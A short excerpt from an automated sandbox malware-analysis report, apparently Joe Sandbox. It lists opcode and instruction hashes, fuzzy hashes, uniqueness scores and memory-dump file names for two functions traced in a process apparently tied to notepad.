                    • Opcode ID: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction ID: d4501e7583759ca70440bdae6b1d977bc74ed31f48a38c2c6935fb96421e49de
                    • Opcode Fuzzy Hash: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction Fuzzy Hash: 82A1FC31608A4C8FDB65EF29C889BEA77E5FBA8315F10466FE44AC7160EB30D645CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5A8DB Relevance: .3, Instructions: 257COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction ID: 71a88e222ba5c082edcbe2b681acf4e9beb265da4e512942173f40220b60fed3
                    • Opcode Fuzzy Hash: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction Fuzzy Hash: ED816231618B499BEB78DF2898897EAB7E5FB58301F00562F989BC3141EF30E5558BC1
                    Uniqueness

                    Uniqueness Score: -1.00%